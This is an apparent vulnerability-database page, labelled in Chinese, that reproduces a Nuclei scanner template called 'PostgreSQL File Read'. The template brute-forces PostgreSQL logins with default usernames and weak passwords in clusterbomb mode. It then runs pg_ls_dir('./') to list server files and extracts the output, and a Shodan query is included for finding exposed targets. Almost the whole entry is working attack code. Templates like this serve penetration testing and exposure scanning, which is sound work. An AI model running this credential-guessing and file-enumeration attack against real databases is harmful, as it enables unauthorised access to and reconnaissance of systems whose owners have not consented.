pgsql-file-read: PostgreSQL File Read

日期: 2025-08-01 | 影响软件: PostgreSQL | POC: 已公开

漏洞描述

Read and list the files within the PostgreSQL database,

PoC代码[已公开]

id: pgsql-file-read

info:
  name: PostgreSQL File Read
  author: pussycat0x
  severity: high
  description: |
    Read and list the files within the PostgreSQL database,
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
  metadata:
    verified: true
    max-request: 8
    shodan-query: "product:\"PostgreSQL\""
  tags: js,network,postgresql,authenticated,enum,discovery
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const postgres = require('nuclei/postgres');
      const client = new postgres.PGClient;
      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
      Export(connected);

    args:
      Host: "{{Host}}"
      Port: 5432
      User: "{{usernames}}"
      Pass: "{{password}}"
      Db: "{{database}}"

    payloads:
      usernames:
        - postgres
        - admin
      password:
        - postgres
        -
        - 123
        - amber
      database:
        - postgres

    attack: clusterbomb

    extractors:
      - type: json
        json:
          - '.Rows[].pg_ls_dir'
# digest: 4a0a00473045022100ee372a3164d2304e4345e7d7f4f9ad48c20030d6f710b6186edcf50fb6d7a58a02204976e5349ee0c01ff85af63e6d9c0cacd3119886bbe22fc777d5a0bdff3316d0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐